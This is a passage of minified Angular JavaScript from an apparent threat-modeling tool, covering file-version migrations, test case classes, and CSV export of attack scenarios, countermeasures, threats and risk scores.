n=this.buildMsg(e,i);this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-warning"})}ShowHistory(){this.dialog.open(rSe,{hasBackdrop:!0,data:this.Messages}).afterClosed().subscribe(i=>{i&&(this.Messages.length=0)})}buildMsg(e,i){let n="";try{n=this.translateService.instant(e)}catch(r){n=e}return i&&"string"==typeof i?n+=" "+i:i&&"Array"==this.getParamType(i)?(n+=" ",i.forEach(r=>{n+=String(r)+"; "}),n=n.substring(0,n.length-2)):i&&"Object"==this.getParamType(i)?n=n+"\n"+JSON.stringify(i,null,2):i&&(n+=" Unknown parameters, see console",console.log(i)),n}getParamType(e){return null===e?"null":void 0===e?"undefined":e.constructor==="test".constructor?"String":e.constructor===[].constructor?"Array":e.constructor==={}.constructor?"Object":""}}return t.\u0275fac=function(e){return new(e||t)(At(I1e),At(Sn),At(_r),At(vu))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),D5=(()=>{class t{constructor(e,i){this.messageService=e,this.translate=i,this.configUpdates=[this.configV2,this.configV3,this.configV4,this.configV5],this.projectUpdates=[this.projectV2,this.projectV3,this.projectV4,this.projectV5,this.projectV6,this.projectV7]}UpdateProjectFile(e){let i=this.UpdateConfigFile(e.config),n=this.updateFile(e,!1);return i=i||n,i}UpdateConfigFile(e){return this.updateFile(e,!0)}updateFile(e,i){const n=i?t.ConfigVersion:t.ProjectVersion,r=i?"Config":"Project",c=i?this.configUpdates:this.projectUpdates;if(e.Data.Version!=n){const d=e.Data.Version;try{for(let T=e.Data.Version+1;T<=n;T++)c[T-2](e),e.Data.Version=T;return setTimeout(()=>{this.messageService.Success(Gi.Format(this.translate.instant("messages.success.updated"+r),d.toString(),n.toString()))},1e3),!0}catch(T){setTimeout(()=>{this.messageService.Error(Gi.Format(this.translate.instant("messages.erorr.updateFailed"+r),d.toString(),n.toString()),T)},1e3)}}return!1}projectV2(e){e.systemThreats.forEach(i=>{const n=["Confidentiality","Integrity","Availability","Authorization","Authenticity","Non-repudiation","Auditability","Trustworthiness","Safety","Privacy","Compliance","Financial","Reputation","Customer Satisfcation","Production Process"];let r=[];for(const[c,d]of Object.entries(i.ImpactCats))1==d&&r.push(n.indexOf(c)+1);i.ImpactCats=r})}projectV3(e){let i=[];e.threatActors=[],e.threatSources.Sources.forEach(n=>{const r=Fo();e.threatActors.push({ID:r,Name:n.Name,Description:"",Likelihood:n.Likelihood,Motive:n.Motive}),i.push(r)}),delete e.threatSources.Sources,e.threatSources.sourceIDs=i}projectV4(e){let i=n=>{n.Note=n.Task,delete n.Task,n.IsChecked=n.IsDone,delete n.IsDone,n.Author="",n.Date="",n.ShowTimestamp=!1,n.HasCheckbox=!0};e.Data.Tasks&&e.Data.Tasks.forEach(n=>i(n)),e.mitigationProcesses&&e.mitigationProcesses.forEach(n=>{n.Tasks&&n.Tasks.forEach(r=>i(r))})}projectV5(e){e.threatMappings&&(t.renameKey(e,"threatMappings","attackScenarios"),e.attackScenarios.forEach(i=>{i.deviceThreatIDs&&t.renameKey(e,"deviceThreatIDs","systemThreatIDs")})),e.deviceThreats&&t.renameKey(e,"deviceThreats","systemThreats"),e.mitigationMappings&&t.renameKey(e,"mitigationMappings","countermeasures"),e.countermeasures&&e.countermeasures.forEach(i=>{i.threatMappingIDs&&t.renameKey(e,"threatMappingIDs","attackScenarioIDs")}),e.countermeasures&&e.countermeasures.forEach(i=>{t.renameKey(i,"mitigationID","controlID")})}projectV6(e){e.attackScenarios&&e.attackScenarios.forEach(i=>{i.Mapping&&i.Mapping.Threat&&t.renameKey(i.Mapping.Threat,"ThreatOriginID","AttackVectorID")})}projectV7(e){if(e.threatActors)for(let i=0;i<e.threatActors.length;i++)e.threatActors[i].Number=(i+1).toString();if(e.systemThreats)for(let i=0;i<e.systemThreats.length;i++)e.systemThreats[i].Number=(i+1).toString();if(e.assetGroups){let i=1;e.assetGroups.forEach(n=>{const r=e.config.assetGroups.find(c=>c.Name==n.Name);n.IsNewAsset=!r,n.IsNewAsset&&(n.Number=i.toString(),i+=1),n.associatedDataIDs&&n.associatedDataIDs.forEach(c=>{const d=e.myData.find(T=>T.ID==c);if(d){const T=e.config.myData.find(k=>k.Name==d.Name);d.IsNewAsset=!T,d.IsNewAsset&&(d.Number=i.toString(),i+=1)}})})}}configV2(e){e.attackVectors.forEach(i=>{let n=[];for(const[r,c]of Object.entries(i.ThreatIntroduced))1==c&&n.push(r);i.ThreatIntroduced=n,n=[];for(const[r,c]of Object.entries(i.ThreatExploited))1==c&&n.push(r);i.ThreatExploited=n}),e.threatCategories.forEach(i=>{const n=["Confidentiality","Integrity","Availability","Authorization","Authenticity","Non-repudiation","Auditability","Trustworthiness","Safety","Privacy","Compliance","Financial","Reputation","Customer Satisfcation","Production Process"];let r=[];for(const[c,d]of Object.entries(i.ImpactCats))1==d&&r.push(n.indexOf(c)+1);i.ImpactCats=r})}configV3(e){e.Data.mitigationLibraryID&&t.renameKey(e.Data,"mitigationLibraryID","controlLibraryID"),e.mitigations&&t.renameKey(e,"mitigations","controls"),e.mitigationGroups&&(t.renameKey(e,"mitigationGroups","controlGroups"),e.controlGroups.forEach(i=>{t.renameKey(i,"mitigationGroupIDs","controlGroupIDs"),t.renameKey(i,"mitigationIDs","controlIDs")}))}configV4(e){if(e.attackVectorGroups)return console.log("Failed previous update"),void(e.controls&&e.controls.forEach(i=>{t.renameKey(i,"mitigatedattackVectorIDs","mitigatedAttackVectorIDs")}));e.threatOrigins&&e.threatOriginGroups&&(t.renameKey(e,"threatOriginGroups","attackVectorGroups"),t.renameKey(e,"threatOrigins","attackVectors"),e.attackVectorGroups.forEach(i=>{t.renameKey(i,"threatOriginGroupIDs","attackVectorGroupIDs"),t.renameKey(i,"threatOriginIDs","attackVectorIDs")})),e.controls&&e.controls.forEach(i=>{t.renameKey(i,"mitigatedThreatOriginIDs","mitigatedAttackVectorIDs")}),e.threatRules&&e.threatRules.forEach(i=>{i.Mapping&&t.renameKey(i.Mapping,"ThreatOriginID","AttackVectorID")})}configV5(e){e.stencilThreatMnemonics&&e.stencilThreatMnemonics.forEach(i=>{i.Letters&&i.Letters.forEach(n=>{null==n.ID&&(n.ID=Fo())})})}static renameKey(e,i,n){e[n]=e[i],delete e[i]}}return t.ProjectVersion=7,t.ConfigVersion=5,t.\u0275fac=function(e){return new(e||t)(At(A2),At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var zu=(()=>{return(t=zu||(zu={}))[t.NotSet=1]="NotSet",t[t.Pass=2]="Pass",t[t.Fail=3]="Fail",zu;var t})();class Qg{static GetKeys(){return[zu.NotSet,zu.Pass,zu.Fail]}static ToString(a){switch(a){case zu.NotSet:return"properties.testcasestate.NotSet";case zu.Pass:return"properties.testcasestate.Pass";case zu.Fail:return"properties.testcasestate.Fail";default:return console.error("Missing State in TestCaseStateUtil.ToString()",a),"Undefined"}}}class $g extends Ln{constructor(a,e,i){super(a),this.project=e,null==this.Status&&(this.Status=zu.NotSet),this.PreConditions||(this.PreConditions=[]),this.Steps||(this.Steps=[]),this.TestData||(this.TestData=[]),this.Summary||(this.Summary=[]),this.Images||(this.Images=[]),this.Data.linkedElementIDs||(this.Data.linkedElementIDs=[]),this.Data.linkedScenarioIDs||(this.Data.linkedScenarioIDs=[]),this.Data.linkedMeasureIDs||(this.Data.linkedMeasureIDs=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get PreConditions(){return this.Data.PreConditions}set PreConditions(a){this.Data.PreConditions=a}get Version(){return this.Data.Version}set Version(a){this.Data.Version=a}get Steps(){return this.Data.Steps}set Steps(a){this.Data.Steps=a}get TestData(){return this.Data.TestData}set TestData(a){this.Data.TestData=a}get Summary(){return this.Data.Summary}set Summary(a){this.Data.Summary=a}get Status(){return this.Data.Status}set Status(a){this.Data.Status=a}get Images(){return this.Data.Images}set Images(a){this.Data.Images=a}get LinkedElements(){let a=[];return this.Data.linkedElementIDs.forEach(e=>{let i=this.project.GetDFDElement(e);i||(i=this.project.GetComponent(e)),i&&a.push(i)}),a}set LinkedElements(a){this.Data.linkedElementIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedScenarios(){let a=[];return this.Data.linkedScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set LinkedScenarios(a){this.Data.linkedScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedMeasures(){let a=[];return this.Data.linkedMeasureIDs.forEach(e=>a.push(this.project.GetCountermeasure(e))),a}set LinkedMeasures(a){this.Data.linkedMeasureIDs=null==a?void 0:a.map(e=>e.ID)}AddLinkedElement(a){this.LinkedElements.includes(a)||this.Data.linkedElementIDs.push(a.ID)}RemoveLinkedElement(a){const e=this.Data.linkedElementIDs.indexOf(a);e>=0&&this.Data.linkedElementIDs.splice(e,1)}AddLinkedAttackScenario(a){this.LinkedScenarios.includes(a)||this.Data.linkedScenarioIDs.push(a.ID)}RemoveLinkedAttackScenario(a){const e=this.Data.linkedScenarioIDs.indexOf(a);e>=0&&this.Data.linkedScenarioIDs.splice(e,1)}AddLinkedCountermeasure(a){this.LinkedMeasures.includes(a)||this.Data.linkedMeasureIDs.push(a.ID)}RemoveLinkedCountermeasure(a){const e=this.Data.linkedMeasureIDs.indexOf(a);e>=0&&this.Data.linkedMeasureIDs.splice(e,1)}GetViewOfLinkedElement(a){let e=this.project.FindDiagramOfElement(a.ID);return e||(e=this.project.GetStacks().find(i=>i.GetChildrenFlat().some(n=>n.ID==a.ID))),e}CheckUniqueNumber(){return this.project.GetTestCases().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"TC"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){a.GetTesting().RemoveTestCase(this)}static FromJSON(a,e,i){return new $g(a,e,i)}}class fM extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.testCaseIDs||(this.Data.testCaseIDs=[])}get TestCases(){let a=[];return this.Data.testCaseIDs.forEach(e=>a.push(this.project.GetTestCase(e))),a}set TestCases(a){this.Data.testCaseIDs=null==a?void 0:a.map(e=>e.ID)}AddTestCase(a){this.TestCases.includes(a)||this.Data.testCaseIDs.push(a.ID)}RemoveTestCase(a){this.TestCases.includes(a)&&this.Data.testCaseIDs.splice(this.Data.testCaseIDs.indexOf(a.ID),1)}FindReferences(a,e){const i=[];return null==a||a.GetTestCases().forEach(n=>i.push({Type:li.DeleteTestCase,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteTestCase&&a.DeleteTestCase(n.Param)})}static FromJSON(a,e,i){return new fM(a,e,i)}}var jo=(()=>{return(t=jo||(jo={}))[t.AttackScenarios=1]="AttackScenarios",t[t.Countermeasures=2]="Countermeasures",t[t.SystemThreats=3]="SystemThreats",t[t.ThreatSources=4]="ThreatSources",t[t.MitigationProcesses=5]="MitigationProcesses",t[t.TestCases=6]="TestCases",jo;var t})();let Gn=(()=>{class t{}return t.wrap=(a,e)=>e?"string"==typeof e?[e.replace(/\n/g,"; ").replace(/"/g,'""')]:"number"==typeof e&&"de"==a.currentLang?[e.toString().replace(".",",")]:[e]:[""],t})();class OG{static GetKeys(){return[jo.AttackScenarios,jo.Countermeasures,jo.MitigationProcesses,jo.SystemThreats,jo.ThreatSources,jo.TestCases]}static ToString(a){switch(a){case jo.AttackScenarios:return"exporttype.AttackScenarios";case jo.Countermeasures:return"exporttype.Countermeasures";case jo.MitigationProcesses:return"exporttype.MitigationProcesses";case jo.SystemThreats:return"exporttype.SystemThreats";case jo.ThreatSources:return"exporttype.ThreatSources";case jo.TestCases:return"exporttype.TestCases";default:return console.error("Missing Export Type in ExportTypeUtil.ToString()"),"Undefined"}}}var Ol=(()=>{return(t=Ol||(Ol={}))[t.All=0]="All",t[t.Applicable=1]="Applicable",t[t.NotApplicable=2]="NotApplicable",Ol;var t})();class NG{static GetKeys(){return[Ol.All,Ol.Applicable,Ol.NotApplicable]}static ToString(a){switch(a){case Ol.All:return"exportfilters.All";case Ol.Applicable:return"exportfilters.Applicable";case Ol.NotApplicable:return"exportfilters.NotApplicable";default:return console.error("Missing Filter in ExportFilterUtil.ToString()"),"Undefined"}}}var Kg=(()=>{return(t=Kg||(Kg={})).Name="Name",t.Description="Description",Kg;var t})();class Yo{static GetKeys(){return[Kg.Name,Kg.Description]}static GetValue(a,e){if(!e)return"";let i=e[a];return i||(i=e.Data[a]),i}static ToString(a){switch(a){case Kg.Name:return"general.Name";case Kg.Description:return"properties.Description";default:return console.error("Missing Prop in ExportCommonPropertyUtil.ToString()"),"Undefined"}}}var ma=(()=>{return(t=ma||(ma={})).Number="Number",t.ThreatState="ThreatState",t.AttackVector="AttackVector",t.Targets="Targets",t.ThreatCategories="ThreatCategories",t.SystemThreats="SystemThreats",t.ThreatSources="ThreatSources",t.Diagram="Diagram",t.VectorCVSS="VectorCVSS",t.ScoreCVSS="ScoreCVSS",t.VectorOwaspRR="VectorOwaspRR",t.ScoreOwaspRR="ScoreOwaspRR",t.Severity="Severity",t.SeverityReason="SeverityReason",t.Likelihood="Likelihood",t.LikelihoodReason="LikelihoodReason",t.Risk="Risk",t.RiskReason="RiskReason",t.RiskStrategy="RiskStrategy",t.RiskStrategyReason="RiskStrategyReason",t.Countermeasures="Countermeasures",t.MyTags="MyTags",ma;var t})();class bT{static GetKeys(){return[ma.Number,ma.ThreatState,ma.AttackVector,ma.Targets,ma.Diagram,ma.ThreatCategories,ma.SystemThreats,ma.ThreatSources,ma.VectorCVSS,ma.ScoreCVSS,ma.VectorOwaspRR,ma.ScoreOwaspRR,ma.Severity,ma.SeverityReason,ma.Likelihood,ma.LikelihoodReason,ma.Risk,ma.RiskReason,ma.RiskStrategy,ma.RiskStrategyReason,ma.Countermeasures,ma.MyTags]}static GetValues(a,e,i){var n,r;if(null==e)return[""];const c=d=>{const T=Yo.GetValue(a,e);return T?Gn.wrap(i,d(T)):[""]};if(this.GetKeys().includes(a)){if([ma.Targets,ma.ThreatCategories,ma.SystemThreats,ma.ThreatSources,ma.MyTags].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(d=>Yo.GetValue("Name",d)).join("; "));if([ma.AttackVector].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if(a==ma.ThreatState)return c(ku.ToString);if(a==ma.VectorCVSS){const d=Wm.GetVector(e.ScoreCVSS);return Gn.wrap(i,(null==d?void 0:d.length)>8?d:"")}if(a==ma.ScoreCVSS){let d=Yo.GetValue(a,e);return d&&(d=d.Score),Gn.wrap(i,d)}if(a==ma.VectorOwaspRR)return Gn.wrap(i,Wm.GetVector(e.ScoreOwaspRR));if(a==ma.ScoreOwaspRR){let d=Yo.GetValue(a,e);return Gn.wrap(i,d?vn.ToString(d.Score):d)}if([ma.Severity,ma.Risk].includes(a))return c(vn.ToString);if([ma.Likelihood].includes(a))return c(An.ToString);if(a==ma.RiskStrategy)return c(fT.ToString);if(a==ma.Diagram)return Gn.wrap(i,e.GetDiagram().Name);if(a==ma.Countermeasures)return Gn.wrap(i,null===(r=e.GetCountermeasures())||void 0===r?void 0:r.map(d=>d.GetLongName()).join("; "))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case ma.Number:return"general.Number";case ma.ThreatState:return"properties.Status";case ma.AttackVector:return"general.AttackVector";case ma.Targets:return"general.Targets";case ma.ThreatCategories:return"general.ThreatCategories";case ma.SystemThreats:return"general.SystemThreats";case ma.ThreatSources:return"general.ThreatSources";case ma.Diagram:return"general.Diagram";case ma.VectorCVSS:return"report.CvssVector";case ma.ScoreCVSS:return"report.CvssScore";case ma.VectorOwaspRR:return"report.OwaspRRVector";case ma.ScoreOwaspRR:return"report.OwaspRRScore";case ma.Severity:return"properties.Severity";case ma.SeverityReason:return"properties.SeverityReason";case ma.Likelihood:return"general.Likelihood";case ma.LikelihoodReason:return"properties.LikelihoodReason";case ma.Risk:return"properties.Risk";case ma.RiskReason:return"properties.RiskReason";case ma.RiskStrategy:return"properties.RiskStrategy";case ma.RiskStrategyReason:return"properties.RiskStrategyReason";case ma.Countermeasures:return"general.Countermeasures";case ma.MyTags:return"general.Tags";default:return console.error("Missing Prop in ExportAttackScenarioPropertyUtil.ToString()"),"Undefined"}}}var go=(()=>{return(t=go||(go={})).Number="Number",t.MappingState="MappingState",t.Control="Control",t.Targets="Targets",t.Diagram="Diagram",t.AttackScenarios="AttackScenarios",t.MaxSeverity="MaxSeverity",t.MaxRisk="MaxRisk",t.AttackVectors="AttackVectors",t.MitigationProcess="MitigationProcess",t.MyTags="MyTags",go;var t})();class MT{static GetKeys(){return[go.Number,go.MitigationProcess,go.Control,go.Targets,go.Diagram,go.AttackScenarios,go.MaxSeverity,go.MaxRisk,go.AttackVectors,go.MitigationProcess,go.MyTags]}static GetValues(a,e,i){var n,r,c,d,T;if(this.GetKeys().includes(a)){if([go.Targets,go.AttackVectors,go.MyTags].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(q=>Yo.GetValue("Name",q)).join("; "));if([go.AttackScenarios].includes(a))return Gn.wrap(i,null===(r=e[a])||void 0===r?void 0:r.map(q=>q.GetLongName()).join("; "));if([go.Control].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if([go.MitigationProcess].includes(a))return Gn.wrap(i,null===(c=e[a])||void 0===c?void 0:c.GetLongName());if(a==go.MitigationProcess)return(q=>{const Y=Yo.GetValue(a,e);return Y?Gn.wrap(i,q(Y)):[""]})(Sl.ToString);if(a==go.Diagram)return Gn.wrap(i,e.GetDiagram().Name);if([go.MaxSeverity].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(d=e.AttackScenarios)||void 0===d?void 0:d.map(q=>q.Severity).filter(q=>q&&q>0))));if([go.MaxRisk].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(T=e.AttackScenarios)||void 0===T?void 0:T.map(q=>q.Risk).filter(q=>q&&q>0))))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case go.Number:return"general.Number";case go.MappingState:return"properties.Status";case go.Control:return"general.Control";case go.Targets:return"general.Targets";case go.Diagram:return"general.Diagram";case go.AttackScenarios:return"general.AttackScenarios";case go.MaxSeverity:return"exportprops.MaxSeverity";case go.MaxRisk:return"exportprops.MaxRisk";case go.AttackVectors:return"general.AttackVectors";case go.MitigationProcess:return"general.MitigationProcess";case go.MyTags:return"general.Tags";default:return console.error("Missing Prop in ExportCountermeasurePropertyUtil.ToString()"),"Undefined"}}}var Jo=(()=>{return(t=Jo||(Jo={})).Number="Number",t.ProcessState="MitigationProcessState",t.Progress="Progress",t.Countermeasures="Countermeasures",t.AttackScenarios="AttackScenarios",t.MaxSeverity="MaxSeverity",t.MaxRisk="MaxRisk",t.Tasks="Tasks",t.Notes="Notes",Jo;var t})();class vT{static GetKeys(){return[Jo.Number,Jo.ProcessState,Jo.Progress,Jo.Countermeasures,Jo.AttackScenarios,Jo.MaxSeverity,Jo.MaxRisk,Jo.Tasks,Jo.Notes]}static GetValues(a,e,i){var n,r,c,d,T;if(this.GetKeys().includes(a)){if([Jo.Countermeasures].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(q=>q.GetLongName()).join("; "));if([Jo.AttackScenarios].includes(a))return Gn.wrap(i,null===(r=e.Countermeasures)||void 0===r?void 0:r.map(q=>q.AttackScenarios).flat().map(q=>q.GetLongName()).join("; "));if([Jo.MaxSeverity].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(c=e.Countermeasures)||void 0===c?void 0:c.map(q=>q.AttackScenarios).flat().map(q=>q.Severity).filter(q=>q&&q>0))));if([Jo.MaxRisk].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(d=e.Countermeasures)||void 0===d?void 0:d.map(q=>q.AttackScenarios).flat().map(q=>q.Risk).filter(q=>q&&q>0))));if(a==Jo.ProcessState)return(q=>{const Y=Yo.GetValue(a,e);return Y?Gn.wrap(i,q(Y)):[""]})(C2.ToString);if(a==Jo.Progress)return Gn.wrap(i,Yo.GetValue(a,e)+"%");if([Jo.Tasks,Jo.Notes].includes(a))return null===(T=e[a])||void 0===T?void 0:T.map(q=>q.Note)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case Jo.Number:return"general.Number";case Jo.ProcessState:return"properties.Status";case Jo.Progress:return"general.Progress";case Jo.Countermeasures:return"general.Countermeasures";case Jo.AttackScenarios:return"general.AttackScenarios";case Jo.MaxSeverity:return"exportprops.MaxSeverity";case Jo.MaxRisk:return"exportprops.MaxRisk";case Jo.Tasks:return"general.Tasks";case Jo.Notes:return"general.Notes";default:return console.error("Missing Prop in ExportMitigationProcessProperties.ToString()"),"Undefined"}}}var kc=(()=>{return(t=kc||(kc={})).Number="Number",t.Impact="Impact",t.ImpactCats="ImpactCats",t.ThreatCategory="ThreatCategory",t.AffectedAssetObjects="AffectedAssetObjects",kc;var t})();class AT{static GetKeys(){return[kc.Number,kc.Impact,kc.ImpactCats,kc.ThreatCategory,kc.AffectedAssetObjects]}static GetValues(a,e,i){var n,r;if(this.GetKeys().includes(a)){if([kc.AffectedAssetObjects].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(d=>Yo.GetValue("Name",d)).join("; "));if([kc.ThreatCategory].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if([kc.Impact].includes(a))return(d=>{const T=Yo.GetValue(a,e);return T?Gn.wrap(i,d(T)):[""]})(An.ToString);if(a==kc.ImpactCats)return Gn.wrap(i,null===(r=e[a])||void 0===r?void 0:r.map(d=>i.instant(Vs.ToString(d))).join("; "))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case kc.Impact:return"properties.Impact";case kc.ImpactCats:return"properties.ImpactCategories";case kc.ThreatCategory:return"general.ThreatCategory";case kc.AffectedAssetObjects:return"report.AffectedAssets";default:return console.error("Missing Prop in ExportSystemThreatPropertyUtil.ToString()"),"Undefined"}}}var id=(()=>{return(t=id||(id={})).Number="Number",t.Motive="Motive",t.Capabilities="Capabilities",t.Likelihood="Likelihood",id;var t})();class TT{static GetKeys(){return[id.Number,id.Motive,id.Capabilities,id.Likelihood]}static GetValues(a,e,i){var n;if(this.GetKeys().includes(a)){if([id.Motive,id.Capabilities].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.join("; "));if([id.Likelihood].includes(a))return(c=>{const d=Yo.GetValue(a,e);return d?Gn.wrap(i,c(d)):[""]})(An.ToString)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case id.Motive:return"properties.Motive";case id.Capabilities:return"properties.Capabilities";case id.Likelihood:return"properties.Likelihood";default:return console.error("Missing Prop in ExportThreatSourcePropertyUtil.ToString()"),"Undefined"}}}var $r=(()=>{return(t=$r||($r={})).Number="Number",t.Status="Status",t.Version="Version",t.PreConditions="PreConditions",t.Steps="Steps",t.TestData="TestData",t.Summary="Summary",$r;var t})();class ET{static GetKeys(){return[$r.Number,$r.Status,$r.Version,$r.PreConditions,$r.Steps,$r.TestData,$r.Summary]}static GetValues(a,e,i){var n;if(this.GetKeys().includes(a)){if([$r.PreConditions,$r.Steps,$r.TestData].includes(a))return e[a];if([$r.Summary].includes(a))return null===(n=e[a])||void 0===n?void 0:n.map(c=>c.Note);if(a==$r.Status)return(c=>{const d=Yo.GetValue(a,e);return d?Gn.wrap(i,c(d)):[""]})(Qg.ToString)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case $r.Number:return"general.Number";case $r.Status:return"properties.Status";case $r.Version:return"properties.Version";case $r.PreConditions:return"properties.PreConditions";case $r.Steps:return"properties.Steps";case $r.TestData:return"properties.TestData";case $r.Summary:return"properties.Summary";default:return console.error("Missing Prop in ExportTestCasePropertyUtil.ToString()"),"Undefined"}}}var Qo=(()=>{return(t=Qo||(Qo={})).AttackScenario="AttackScenario",t.Countermeasure="Countermeasure",t.MitigationProcess="MitigationProcess",t.SystemThreat="SystemThreat",t.ThreatSources="ThreatSources",t.TestCase="TestCase",Qo;var t})();class DT{static GetKeys(a=null){return a?a==jo.AttackScenarios?[Qo.AttackScenario]:a==jo.Countermeasures?[Qo.Countermeasure]:a==jo.MitigationProcesses?[Qo.MitigationProcess]:a==jo.SystemThreats?[Qo.SystemThreat]:a==jo.ThreatSources?[Qo.ThreatSources]:a==jo.TestCases?[Qo.TestCase]:void 0:[Qo.AttackScenario,Qo.Countermeasure,Qo.SystemThreat]}static GetProperties(a){return a==Qo.AttackScenario?[...Yo.GetKeys(),...bT.GetKeys()]:a==Qo.Countermeasure?[...Yo.GetKeys(),...MT.GetKeys()]:a==Qo.MitigationProcess?[...Yo.GetKeys(),...vT.GetKeys()]:a==Qo.SystemThreat?[...Yo.GetKeys(),...AT.GetKeys()]:a==Qo.ThreatSources?[...Yo.GetKeys(),...TT.GetKeys()]:a==Qo.TestCase?[...Yo.GetKeys(),...ET.GetKeys()]:[]}static GetValues(a,e,i){const n=a.split(".");switch(n[0]){case Qo.AttackScenario:return bT.GetValues(n[1],e,i);case Qo.Countermeasure:return MT.GetValues(n[1],e,i);case Qo.MitigationProcess:return vT.GetValues(n[1],e,i);case Qo.SystemThreat:return AT.GetValues(n[1],e,i);case Qo.ThreatSources:return TT.GetValues(n[1],e,i);case Qo.TestCase:return ET.GetValues(n[1],e,i);default:return[""]}}static ToString(a){switch(a){case Qo.AttackScenario:return"exportclasses.AttackScenario";case Qo.Countermeasure:return"exportclasses.Countermeasure";case Qo.MitigationProcess:return"exportclasses.MitigationProcess";case Qo.SystemThreat:return"exportclasses.SystemThreat";case Qo.ThreatSources:return"exportclasses.ThreatSource";case Qo.TestCase:return"exportclasses.TestCase";default:return console.error("Missing Export Class in ExportClassUtil.ToString()"),"Undefined"}}}class xT extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.ExportType||(this.ExportType=jo.AttackScenarios),null==this.ExportFilter&&(this.ExportFilter=Ol.Applicable)}get ExportType(){return this.Data.ExportType}set ExportType(a){this.Data.ExportType=a}get ExportFilter(){return this.Data.ExportFilter}set ExportFilter(a){this.Data.ExportFilter=a}get HasExportFilter(){return[jo.AttackScenarios,jo.Countermeasures].includes(this.ExportType)}get Template(){return this.Data.Template}set Template(a){this.Data.Template=a}GetRowData(a){const e=[];let i;return this.ExportType==jo.AttackScenarios?i=this.ExportFilter==Ol.Applicable?this.project.GetAttackScenariosApplicable():this.ExportFilter==Ol.NotApplicable?this.project.GetAttackScenariosNotApplicable():this.project.GetAttackScenarios():this.ExportType==jo.Countermeasures?i=this.ExportFilter==Ol.Applicable?this.project.GetCountermeasuresApplicable():this.ExportFilter==Ol.NotApplicable?this.project.GetCountermeasuresNotApplicable():this.project.GetCountermeasures():this.ExportType==jo.MitigationProcesses?i=this.project.GetMitigationProcesses():this.ExportType==jo.SystemThreats?i=this.project.GetSystemThreats():this.ExportType==jo.ThreatSources?i=this.project.GetThreatSources().Sources:this.ExportType==jo.TestCases&&(i=this.project.GetTesting().TestCases),i.sort((n,r)=>Number(n.Number)-Number(r.Number)),i.forEach(n=>{var r,c,d;let T=[];const k=[];for(let q=0;q<this.Template.length;q++)if(this.Template[q].value){let Y=DT.GetValues(this.Template[q].value,n,a);if(Y.length>=1?(null===(r=Y[0])||void 0===r?void 0:r.length)>0?T.push(a.instant(Y[0])):T.push(Y[0]):T.push(""),Y.length>1){k[q]=[];for(let te=1;te<Y.length;te++)(null===(c=Y[te])||void 0===c?void 0:c.length)>0?k[q].push(a.instant(Y[te])):k[q].push(Y[te])}}if(e.push(T),k.length>0){const q=Math.max(...k.map(Y=>null==Y?void 0:Y.length).filter(Y=>Y));for(let Y=0;Y<q;Y++){T=[];for(let te=0;te<this.Template.length;te++)(null===(d=k[te])||void 0===d?void 0:d.length)>Y?T.push(k[te][Y]):T.push("");e.push(T)}}}),e}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new xT(a,e,i)}}var ad=(()=>{return(t=ad||(ad={}))[t.Severity=1]="Severity",t[t.Risk=2]="Risk",t[t.Countermeasure=3]="Countermeasure",ad;var t})();class LG{static GetKeys(){return[ad.Severity,ad.Risk,ad.Countermeasure]}static ToString(a){switch(a){case ad.Severity:return"properties.tagcharttype.Severity";case ad.Risk:return"properties.tagcharttype.Risk";case ad.Countermeasure:return"properties.tagcharttype.Countermeasure";default:return console.error("Missing State in TagChartTypeUtil.ToString()",a),"Undefined"}}}class pM extends Ln{constructor(a,e,i){super(a),this.project=e,this.Color||(this.Color="#2196f3")}get Color(){return this.Data.Color}set Color(a){this.Data.Color=a}get ColorPicker(){var a;if((null===(a=this.colorPicker)||void 0===a?void 0:a.toHexString())!=this.Color){let e=this.Color.replace("#","").match(/.{1,2}/g),i=[parseInt(e[0],16),parseInt(e[1],16),parseInt(e[2],16)];this.colorPicker=new kp(i[0],i[1],i[2])}return this.colorPicker}set ColorPicker(a){this.Color=a.toHexString()}FindReferences(a,e){let i=[];return 